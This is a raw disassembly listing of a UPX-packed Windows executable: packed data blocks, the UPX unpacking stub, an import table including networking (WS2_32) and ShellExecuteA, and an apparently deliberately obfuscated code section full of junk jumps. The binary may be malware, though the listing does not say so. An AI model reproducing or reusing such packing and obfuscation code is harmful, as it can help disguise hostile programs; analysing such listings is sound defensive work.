dd 3B290D57h, 0BC222273h, 62CF1081h, 51ECB7D0h, 54A427CBh
dd 4EF60562h, 8F5D6F50h, 2062562Ch, 0C22C2B6Ch, 0E184AD1Ch
dd 40F75DAh, 2D65876Bh, 0EE8401C8h, 87D54E33h, 7469C080h
dd 0B2D88B68h, 1B05E6F6h, 0C5CC6FF8h, 7D38160Bh, 95A0338Dh
dd 91561054h, 223DACADh, 9C3A7300h, 5AB611A9h, 306C7927h
dd 0D419661h, 0DA5B24C0h, 87A9EC1Bh, 0BC732545h, 0AAC55404h
dd 28730936h, 83652D05h, 1B1F6585h, 59301088h, 12E96348h
dd 0A08040D2h, 4551886Eh, 59827F8Ah, 155EAE05h, 0A2756363h
dd 5984B6B2h, 8EAD3BB0h, 41421B39h, 2008854Bh, 2464EC1h
dd 686D7572h, 0B096B0B1h, 8A235143h, 96300378h, 193AAEB7h
dd 0B0C0DACBh, 0C9AF7833h, 7506C25Eh, 11D561Ah, 0DDE096Fh
dd 41FF65D0h, 5B617B99h, 3341793Ch, 34417A36h, 0FA5FA97Fh
dd 68456438h, 6867B566h, 0ED675247h, 6C553568h, 0A97F7644h
dd 33D8E0h, 0D46C46B7h, 5C505846h, 1A026973h, 2E1010B0h
dd 5600BAE0h, 7716B0F6h, 354E0B67h, 9B066300h, 0D81B0C41h
dd 94012E30h, 25E87D4Bh, 6C4F538Dh, 8F7DC141h, 623F1843h
dd 0D48B5870h, 11D2868h, 0C3D12D0Ch, 935C1C08h, 1E5C315Ch
dd 1349810Bh, 25876ABBh, 2F4C901Bh, 462045E6h, 108290h
dd 0A201C148h, 45215B25h, 0CDB172E4h, 4002A610h, 0DDAB1305h
dd 0AFCF2156h, 253D3C50h, 3B443347h, 7038180h, 8660690Fh
dd 0F715003h, 6DF95E2Fh, 5B000D59h, 5D5E5B25h, 61B0D90Ch
dd 3B434BC3h, 24ECAC33h, 0DB5BC388h, 3B290ECAh, 1460CAD9h
dd 532B6D09h, 5A6C3265h, 483041Fh, 20A22013h, 18210AFDh
dd 45491F36h, 1D86413Ah, 6F782EACh, 5020F543h, 1830087Dh
dd 2DDD4C00h, 0C348161Bh, 4882132Bh, 205B8136h, 1BD81C5Ch
dd 596C895Bh, 444A0846h, 42B0B104h, 5CB44654h, 0A587E16Ch
dd 9706072Fh, 466CE34h, 234906E7h, 56F0B887h, 3631650Bh
dd 9F353588h, 65FD8763h, 4E534D77h, 2DF94520h, 17490Eh
dd 0B844B2A6h, 3962B72Ch, 0F3B0B61Dh, 63393138h, 232D31C7h
dd 1356612h, 2B1F7174h, 35F6EC2Eh, 65653765h, 4F633030h
dd 2AB9CCD5h, 5C7CB617h, 412E054Ch, 35642702h, 452E3033h
dd 64C731A4h, 85B7825h, 0F24615Dh, 43767B73h, 6F1E3FF1h
dd 0D02DB15Ah, 0F3398C11h, 30496B12h, 148CB636h, 60652380h
dd 60A90DD6h, 7456B83Eh, 0DA178204h, 2BF42175h, 4218202Bh
dd 6E277283h, 8A483972h, 13758182h, 106D4E53h, 3550BB71h
dd 664F8563h, 18726108h, 6D05A958h, 73681CB4h, 54BF1801h
dd 60A16E1Eh, 57851821h, 0DB58BD13h, 7665560Eh, 96DB5805h
dd 87648284h, 0B716A22Bh, 3C53715Ah, 0B4365C8Bh, 0B5BB2D80h
dd 7075EA2Ch, 0DCCAC320h, 74DFA660h, 109C4B5Dh, 135CCC0Ah
dd 6A6C4AD7h, 17909188h, 0D34CDAB7h, 38B8574h, 9028303Ch
dd 0FB0641h, 0C14071Ch, 641C9C83h, 0ECD9F400h, 0C82F90E4h
dd 0D80BE020h, 6C190641h, 0BCC807D0h, 90641935h, 4EA4ACB4h
dd 34EFC9Eh, 90D99873h, 641980D9h, 747C4190h, 0B0727268h
dd 58435C01h, 20C850D9h, 40480C83h, 0C80D838h, 1C283032h
dd 0C83219Fh, 40C1432h, 0D9C9800Ch, 0BF407D8h, 90018200h
dd 45E8DE4Bh, 8C433330h, 61204349h, 0CBA2C351h, 785158C3h
dd 0D764A7A0h, 0E4E6D9Fh, 20077536h, 6C632D75h, 2B8407Bh
dd 7BC2980h, 0B128ED32h, 13BB7973h, 8992432Dh, 0AADB7A36h
dd 48530B3Ah, 0D639DC2Dh, 983FC689h, 6C00350Bh, 6900702Fh
dd 8BDBE805h, 278AC566h, 0CE686C02h, 2E0761C1h, 0E8505BCCh
dd 8A96F905h, 62D0779h, 90F344CFh, 752074B3h, 6D4597BCh
dd 0E78BD42h, 6E48095Fh, 3D07B3D8h, 8908133Dh, 6F014836h
dd 4F3D0F13h, 1BB6620Bh, 4D3A2015h, 0DEFA8544h, 796669FBh
dd 4D07A350h, 0FB304133h, 700B485Eh, 0D9BE5A07h, 4F6D3B9Bh
dd 2F705308h, 0C54AD4Ch, 49F8061Ch, 5484D64h, 26623AA6h
dd 3EC4F7ACh, 77327548h, 0CB60E65h, 8E6C8096h, 136E7342h
dd 8DD14C08h, 534DD367h, 28337B22h, 3089E403h, 0FB050BFEh
dd 0B8A0BAE6h, 91C499ECh, 0FFD43B03h, 790F4CFFh, 35C08B1h
dd 0E3F4F66Fh, 0A8C30C12h, 12FBCA1h, 18B28248h, 61C277DEh
dd 0FDC6FF44h, 0EBF7D7E6h, 23AFF7EBh, 0B594532Eh, 0DA00CAAAh
dd 0FF25442Ah, 0B881B1E1h, 0EBF7BDh, 0A78247FFh, 8E96622Eh
dd 0A48BBBA7h, 0A6E6E6E7h, 84A88F9Ah, 0D356DAA2h, 0F30A2482h
dd 0BB80B6FFh, 0B1E6A7B0h, 0FE85DE92h, 712DFBFh, 69658782h
dd 3CAF070h, 0EE8396C1h, 0FE1652Eh, 6C45E068h, 0EE700179h
dd 0A85145CDh, 7F2EF73h, 8A275CA3h, 0CC4D706Eh, 0DE001E58h
dd 3A490F20h, 8A45DC8Dh, 25780525h, 4BFF3378h, 3069B81h
dd 0B3D60FBh, 1B548FDFh, 527F8E10h, 2B6597D1h, 0AFBC19D1h
dd 56413F2Eh, 6081AA5Fh, 655F1D03h, 60840F0h, 1F37AC36h
dd 1A0A39A8h, 1E875FDCh, 0A9200A21h, 1051541Eh, 51B3756h
dd 57E0C44Dh, 40476A60h, 65A88415h, 0F5408BF1h, 4C0E4DCFh
dd 7B61636Fh, 4109ED0Fh, 444E53A5h, 0EAA90569h, 0AD638836h
dd 446C1579h, 5B660A93h, 0E72F6E22h, 6068A325h, 4CF65D1Fh
dd 9229BD0h, 2C0C4FA9h, 195BD142h, 77DE3B76h, 4C010D44h
dd 61726269h, 1D4440Dh, 417B22F5h, 8B5B62C7h, 69A40F5Ah
dd 6F430C10h, 0D97B5117h, 4C647970h, 0A1064A61h, 0DB7B378h
dd 7E697257h, 3D9B7070h, 506876D9h, 5097688Eh, 0D97C7069h
dd 365BD516h, 0BD38124Fh, 305B2D9Bh, 65500F20h, 0D5476B65h
dd 641AF64Bh, 66699043h, 44326A85h, 537A9952h, 0AFA830D1h
dd 50646E87h, 13C14EBDh, 0A03584B0h, 0C3CBC4Fh, 614339BBh
dd 0C010164Dh, 6706529h, 60024D96h, 4A68F454h, 0E28A92C2h
dd 5B73F657h, 62FAA621h, 6544ACC0h, 908AA210h, 8FD58584h
dd 0E9F60D51h, 14354D4h, 0B0B06E55h, 616DFFB3h, 65695670h
dd 0B6664F77h, 54CF0E4Dh, 18CB96E4h, 0D547C7E7h, 627A6DACh
dd 0AF49A14Dh, 75427501h, 6241443Ch, 0A80E186Ah, 334EA053h
dd 1503D413h, 2C680EB4h, 63F90BAAh, 1F01E46Bh, 0CFA9ED50h
dd 6E470350h, 6BB414ECh, 75713A31h, 37681A20h, 6531A58Ch
dd 427349D9h, 0A12D92B4h, 14E86F45h, 108C20CCh, 9DEF5EAAh
dd 490DD7B2h, 2A55452Fh, 40C67544h, 5D6F0588h, 824C3359h
dd 4D11BC21h, 0B2D2E265h, 630BD3C6h, 76160987h, 5A0B635Bh
dd 6D4DD576h, 0C6615670h, 61D44730h, 0A56223D6h, 90876D91h
dd 97A57644h, 9A71B545h, 670900EDh, 0C2ADBDC1h, 377592C3h
dd 3F87CE0Eh, 39103602h, 6879654Bh, 78458B0Dh, 111E330Eh
dd 0CC259B0Dh, 32B80FB6h, 0D8CB440Dh, 0E97355A3h, 0D7585266h
dd 45627250h, 74DB6E6Dh
dd 79AC1C14h, 526EE229h, 410F6D61h, 586CC763h, 24D9A52Bh
dd 66B58B59h, 0C058BDB3h, 5F6114FAh, 9C15CED9h, 0F006C92Bh
dd 2C0AF294h, 43E196B4h, 2BA87878h, 7F707F7Eh, 6A27C409h
dd 0AE313F3Fh, 40454155h, 0E35C1358h, 2A295AB9h, 6681990Eh
dd 0EA0CDA28h, 8C06D0Ah, 84DCD1EFh, 2482364h, 808FB106h
dd 73766C9Bh, 2A66AB6Eh, 62D6DEF7h, 77957F6Fh, 0F910323Bh
dd 20B37FFEh, 59403274h, 58415041h, 0D5A4049h, 7B587B33h
dd 0D0E58AEh, 625F2547h, 316BACD7h, 0E859095Ch, 0FBB6650Fh
dd 5F7676B6h, 11339268h, 667A690Eh, 0D8640368h, 691D069Ah
dd 0CD96D131h, 637536C6h, 98F56E73h, 0E73A8A57h, 73070213h
dd 0B9C30F95h, 38615B2Eh, 54736669h, 9D0EC106h, 0D50630A1h
dd 0AC516306h, 7EAF735h, 407CA77h, 0AE75C957h, 0E235DAC5h
dd 6325071Dh, 0CC97877Bh, 1D75B33Bh, 2C0C0720h, 3D55DEEBh
dd 59B6946Dh, 9413742Eh, 5AE699Ch, 0EA2C801h, 0C8FFB6CDh
dd 0BAD0120Bh, 0F44188D6h, 171A6DC4h, 0CD381D04h, 81C9D81Eh
dd 0D3A22182h, 0BBF602C8h, 9134E8ABh, 706C4177h, 40470E05h
dd 97AF4E63h, 4181C612h, 219177B0h, 60C52D54h, 3B496B58h
dd 41EFBA5Eh, 4E4D08B4h, 0F48C2968h, 7B659659h, 1970204h
dd 59651516h, 13026596h, 96170A05h, 0C965965h, 12386F33h
dd 65965903h, 34097059h, 596D0B06h, 8106596h, 0FD117414h
dd 0F28EDB2Ch, 49415357h, 239FF25h, 0FF210D73h, 501649E5h
dd 3014C45h, 3901F000h, 0E91D9E46h, 0B010F97h, 820601h
dd 67F11382h, 0E882D937h, 707C100Bh, 24B0D0Bh, 75602C4h
dd 818A3DF6h, 10284F14h, 82C2C207h, 2766E58h, 73CB5584h
dd 856968A0h, 70A7EC51h, 41B6F202h, 0D7DD905Fh, 4EB5FE7h
dd 91F0158h, 722EE012h, 17802BC0h, 0FB0E4CECh, 58B7D92Bh
dd 4002D973h, 9827262Eh, 0D3494C71h, 74608034h, 0D97C00C0h
dd 76466830h, 1F703h, 0
dd 12000000h, 0FFh, 0
; ---------------------------------------------------------------------------
loc_421AA0: ; CODE XREF: hjohnhn9:loc_425071�j
pusha
mov esi, offset dword_417000
lea edi, [esi-16000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_421AC2
; ---------------------------------------------------------------------------
align 8
loc_421AB8: ; CODE XREF: UPX1:loc_421AC9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_421ABE: ; CODE XREF: UPX1:00421B56�j
; UPX1:00421B6D�j
add ebx, ebx
jnz short loc_421AC9
loc_421AC2: ; CODE XREF: UPX1:00421AB0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_421AC9: ; CODE XREF: UPX1:00421AC0�j
jb short loc_421AB8
mov eax, 1
loc_421AD0: ; CODE XREF: UPX1:00421ADF�j
; UPX1:00421AEA�j
add ebx, ebx
jnz short loc_421ADB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_421ADB: ; CODE XREF: UPX1:00421AD2�j
adc eax, eax
add ebx, ebx
jnb short loc_421AD0
jnz short loc_421AEC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_421AD0
loc_421AEC: ; CODE XREF: UPX1:00421AE1�j
xor ecx, ecx
sub eax, 3
jb short loc_421B00
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_421B72
mov ebp, eax
loc_421B00: ; CODE XREF: UPX1:00421AF1�j
add ebx, ebx
jnz short loc_421B0B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_421B0B: ; CODE XREF: UPX1:00421B02�j
adc ecx, ecx
add ebx, ebx
jnz short loc_421B18
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_421B18: ; CODE XREF: UPX1:00421B0F�j
adc ecx, ecx
jnz short loc_421B3C
inc ecx
loc_421B1D: ; CODE XREF: UPX1:00421B2C�j
; UPX1:00421B37�j
add ebx, ebx
jnz short loc_421B28
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_421B28: ; CODE XREF: UPX1:00421B1F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_421B1D
jnz short loc_421B39
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_421B1D
loc_421B39: ; CODE XREF: UPX1:00421B2E�j
add ecx, 2
loc_421B3C: ; CODE XREF: UPX1:00421B1A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_421B5C
loc_421B4D: ; CODE XREF: UPX1:00421B54�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_421B4D
jmp loc_421ABE
; ---------------------------------------------------------------------------
align 4
loc_421B5C: ; CODE XREF: UPX1:00421B4B�j
; UPX1:00421B69�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_421B5C
add edi, ecx
jmp loc_421ABE
; ---------------------------------------------------------------------------
loc_421B72: ; CODE XREF: UPX1:00421AFC�j
pop esi
mov edi, esi
mov ecx, 9C1h
loc_421B7A: ; CODE XREF: UPX1:00421B81�j
; UPX1:00421B86�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_421B7F: ; CODE XREF: UPX1:00421BA4�j
cmp al, 1
ja short loc_421B7A
cmp byte ptr [edi], 6
jnz short loc_421B7A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_421B7F
lea edi, [esi+1F000h]
loc_421BAC: ; CODE XREF: UPX1:00421BCE�j
mov eax, [edi]
or eax, eax
jz short loc_421BF7
mov ebx, [edi+4]
lea eax, [eax+esi+21000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+210A0h]
xchg eax, ebp
loc_421BC9: ; CODE XREF: UPX1:00421BEF�j
mov al, [edi]
inc edi
or al, al
jz short loc_421BAC
mov ecx, edi
jns short near ptr loc_421BDA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_421BDA: ; CODE XREF: UPX1:00421BD2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+210A4h]
or eax, eax
jz short loc_421BF1
mov [ebx], eax
add ebx, 4
jmp short loc_421BC9
; ---------------------------------------------------------------------------
loc_421BF1: ; CODE XREF: UPX1:00421BE8�j
call dword ptr [esi+210A8h]
loc_421BF7: ; CODE XREF: UPX1:00421BB0�j
popa
jmp loc_4167F1
; ---------------------------------------------------------------------------
align 800h
UPX1 ends
; Section 3. (virtual address 00022000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00022000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 422000h
dword_422000 dd 3 dup(0) ; DATA XREF: fzj3qwht:0042A15C�o
; sub_432992+9�o
dd 220E0h, 220A0h, 3 dup(0)
dd 220EDh, 220B0h, 3 dup(0)
dd 220FAh, 220B8h, 3 dup(0)
dd 22105h, 220C0h, 3 dup(0)
dd 22112h, 220C8h, 3 dup(0)
dd 2211Eh, 220D0h, 3 dup(0)
dd 22129h, 220D8h, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E75CB5h, 0
dd 77DD189Ah, 0
a@W db '@¹Äw',0
align 10h
dd 7713BC68h, 0
aClbw db '—‹Bw',0
align 10h
aJW db 'jÉÔw',0
align 4
aTLq db 'â]«q',0
align 10h
aKernel32_dll_0 db 'KERNEL32.DLL',0
aAdvapi32_dll db 'ADVAPI32.dll',0
aMsvcrt_dll db 'MSVCRT.dll',0
aOleaut32_dll db 'OLEAUT32.dll',0
aShell32_dll db 'SHELL32.dll',0
aUser32_dll db 'USER32.dll',0
aWs2_32_dll_0 db 'WS2_32.dll',0
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 50746547h, 41636F72h
dd 65726464h, 7373h, 74697845h, 636F7250h, 737365h, 65520000h
dd 6F6C4367h, 654B6573h, 79h, 6C696563h, 68530000h, 456C6C65h
dd 75636578h, 416574h, 73770000h, 6E697270h, 416674h, 39Ch dup(0)
UPX2 ends
; ---------------------------------------------------------------------------
; Section 4. (virtual address 00023000)
; Virtual size : 00007000 ( 28672.)
; Section size in file : 00007000 ( 28672.)
; Offset to raw data for section: 00023000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
hjohnhn9 segment para public 'CODE' use32
assume cs:hjohnhn9
;org 423000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
add esi, 0F2008C74h
jmp sub_426098
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_56. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_111. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42300D: ; CODE XREF: hjohnhn9:004239C5�j
mov eax, [ebp-0Ch]
mov [ebp-1Ch], eax
lea eax, [ebp-125h]
mov [ebp-20h], eax
jmp loc_427F49
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_7. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4287BF
loc_423022: ; CODE XREF: sub_4287BF-1571�j
jmp loc_42369A
; END OF FUNCTION CHUNK FOR sub_4287BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426475
loc_423027: ; CODE XREF: sub_426475+17�j
jmp loc_4234D8
; END OF FUNCTION CHUNK FOR sub_426475
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42626F
loc_42302C: ; CODE XREF: sub_42626F+13�j
jmp loc_4242D9
; END OF FUNCTION CHUNK FOR sub_42626F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42441D
loc_423031: ; CODE XREF: sub_42441D+4�j
; sub_425029:loc_426AD7�j
mov eax, [ebp-0Ch]
push offset sub_42303E
jmp nullsub_8
; END OF FUNCTION CHUNK FOR sub_42441D
; =============== S U B R O U T I N E =======================================
sub_42303E proc near ; DATA XREF: sub_42441D-13E9�o
; FUNCTION CHUNK AT 00424896 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427119 SIZE 00000014 BYTES
movzx eax, byte ptr [eax]
loc_423041: ; CODE XREF: sub_426A78:loc_426588�j
add [ebp-8], eax
mov eax, [ebp-8]
shl eax, 0Ah
jmp loc_424896
sub_42303E endp
; =============== S U B R O U T I N E =======================================
sub_42304F proc near ; DATA XREF: sub_427792-24DB�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0042306D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004237EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424218 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004243F2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424A33 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00424D8C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00424F43 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004260B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426833 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426AE9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426C4F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00426EF9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427102 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004273B2 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 004274F9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00428079 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004282D3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428AA2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00428F45 SIZE 00000005 BYTES
mov ecx, [ebx+ecx+0Ch]
loc_423053: ; CODE XREF: sub_4287BF+E�j
or ecx, ecx
jz loc_4273B2
mov edx, [ebx+ecx]
xor edx, [ebx+ecx+4]
cmp edx, 7C61090Eh
jmp loc_4282D3
sub_42304F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42304F
loc_42306D: ; CODE XREF: sub_42304F:loc_426C4F�j
mov ebx, [eax+18h]
jmp loc_4260B8
; END OF FUNCTION CHUNK FOR sub_42304F
; ---------------------------------------------------------------------------
loc_423075: ; CODE XREF: hjohnhn9:00427F6A�j
adc ebx, 0EA4171D6h
popf
jp loc_423CFC
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_423082: ; CODE XREF: sub_425BD2:loc_425F81�j
jmp loc_42476D
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4236A7
loc_423087: ; CODE XREF: sub_4236A7+26DF�j
pop ebx
sub ebx, 0CE90282Ch
xor ebx, 6D2D7DF6h
or ebx, 7773C380h
jmp loc_4238EB
; END OF FUNCTION CHUNK FOR sub_4236A7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42466E
loc_42309F: ; CODE XREF: sub_42466E:loc_4289F8�j
jnz loc_425DA9
loc_4230A5: ; CODE XREF: hjohnhn9:00424693�j
jmp nullsub_107
; END OF FUNCTION CHUNK FOR sub_42466E
; ---------------------------------------------------------------------------
push 0F1F2C47Eh
xchg ecx, ebx
test ecx, 9233CFC0h
jmp loc_42822C
; ---------------------------------------------------------------------------
loc_4230BC: ; DATA XREF: sub_427C9B-35EA�o
add edx, ebp
add edx, 3EA0911Dh
call sub_42466E
; START OF FUNCTION CHUNK FOR sub_424631
loc_4230C9: ; CODE XREF: sub_424631+464E�j
jmp loc_423180
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_4230CE: ; CODE XREF: sub_423B05:loc_424B45�j
jz loc_423A31
jnz loc_423505
cdq
jmp loc_423A2B
; END OF FUNCTION CHUNK FOR sub_423B05
; =============== S U B R O U T I N E =======================================
sub_4230E0 proc near ; CODE XREF: sub_4275A3:loc_426134�p
; hjohnhn9:00427579�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00425D9E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042772C SIZE 0000001D BYTES
xchg edi, [esp+0]
pop edi
push 7B102949h
pop ebx
rol ebx, 2
jmp loc_425D9E
sub_4230E0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4230F2 proc near ; CODE XREF: sub_42855B:loc_427DCD�j
push ebp
push offset sub_427BCE
jmp nullsub_108
sub_4230F2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426638
loc_4230FD: ; CODE XREF: sub_426638:loc_427F5F�j
xor edx, ds:4000F8h
cmp edx, 51638979h
jmp loc_427F44
; END OF FUNCTION CHUNK FOR sub_426638
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_119. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4241E1
loc_42310F: ; CODE XREF: sub_4241E1+C�j
jmp nullsub_125
; END OF FUNCTION CHUNK FOR sub_4241E1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4250FC
loc_423114: ; CODE XREF: sub_4250FC-3DC�j
mov ecx, eax
pop eax
or ecx, 9ED4A6B5h
rol ecx, 0Ah
jmp loc_427D19
; END OF FUNCTION CHUNK FOR sub_4250FC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_27. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A30
loc_423126: ; CODE XREF: sub_426A30-2266�j
jmp loc_426BBA
; END OF FUNCTION CHUNK FOR sub_426A30
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_42312B: ; CODE XREF: sub_424161+440�j
; DATA XREF: sub_428192:loc_4247CF�o
pop ebp
mov eax, ds:dword_423950
or eax, eax
push offset sub_4248B1
jmp nullsub_36
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
adc edi, eax
jmp sub_424D38
; ---------------------------------------------------------------------------
loc_423145: ; CODE XREF: hjohnhn9:00427A97�j
lea eax, nullsub_1
mov byte ptr [eax], 0C3h
; START OF FUNCTION CHUNK FOR sub_42325E
loc_42314E: ; CODE XREF: sub_42325E:loc_425205�j
push ecx
push 6CA47921h
jmp loc_4276C0
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
mov [ebp-8], eax
push eax
push 38908B4Ah
xchg edi, [esp]
jmp loc_425F6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426671
loc_42316A: ; CODE XREF: sub_426671-268D�j
sub edx, 7A4EC4C0h
add edx, 0AC572996h
push offset loc_428C2D
jmp nullsub_30
; END OF FUNCTION CHUNK FOR sub_426671
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_423180: ; CODE XREF: sub_424631:loc_4230C9�j
mov eax, [ebp+8]
push offset loc_426610
jmp loc_42368D
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4287BF
loc_42318D: ; CODE XREF: sub_4287BF-1221�j
jnz loc_42867B
mov eax, [ebp-4]
inc eax
mov eax, [eax]
add eax, [ebp-4]
jmp loc_42866C
; END OF FUNCTION CHUNK FOR sub_4287BF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_8. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_108. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D6A
loc_4231A3: ; CODE XREF: sub_427D6A+12�j
jmp loc_425121
; END OF FUNCTION CHUNK FOR sub_427D6A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4275A3
loc_4231A8: ; CODE XREF: sub_4275A3-18CC�j
jmp nullsub_99
; END OF FUNCTION CHUNK FOR sub_4275A3
; =============== S U B R O U T I N E =======================================
sub_4231AD proc near ; CODE XREF: hjohnhn9:004231EB�j
; sub_4284CB-4843�p
; FUNCTION CHUNK AT 004249DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424CEC SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004265C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004268E5 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00426A62 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427555 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00427FA4 SIZE 0000000B BYTES
xchg ecx, [esp+0]
pop ecx
jz loc_427555
mov eax, [ebp-4]
mov al, [eax]
and al, 0F6h
jmp loc_426A62
sub_4231AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426475
loc_4231C3: ; CODE XREF: sub_426475+A2C�j
jge loc_425B75
xor ecx, 0D2F1B6E9h
jmp loc_425B6B
; END OF FUNCTION CHUNK FOR sub_426475
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_4231D4: ; CODE XREF: sub_42325E+42EC�j
jz loc_428EBF
loc_4231DA: ; CODE XREF: hjohnhn9:00423FAF�j
jge loc_427D13
jmp loc_4269A0
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
xor ecx, 61C8DFD6h
jmp sub_4231AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_4231F0: ; CODE XREF: sub_424161:loc_429022�j
or eax, 0C35DC7D7h
cmp eax, 7D7341B6h
jmp loc_424D68
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423D67
loc_423201: ; CODE XREF: sub_423D67-672�j
pop ebx
xchg ebx, [esp-4+arg_0]
push eax
push 458343C8h
pop eax
and eax, 0FDA01D0Dh
call sub_4265A0
; END OF FUNCTION CHUNK FOR sub_423D67
; START OF FUNCTION CHUNK FOR sub_426A78
loc_423217: ; CODE XREF: sub_426A78:loc_427436�j
jz loc_426579
jmp loc_4250D5
; END OF FUNCTION CHUNK FOR sub_426A78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_423222: ; CODE XREF: sub_423B05:loc_4238B5�j
test eax, eax
jnz loc_4250B4
jmp loc_42862B
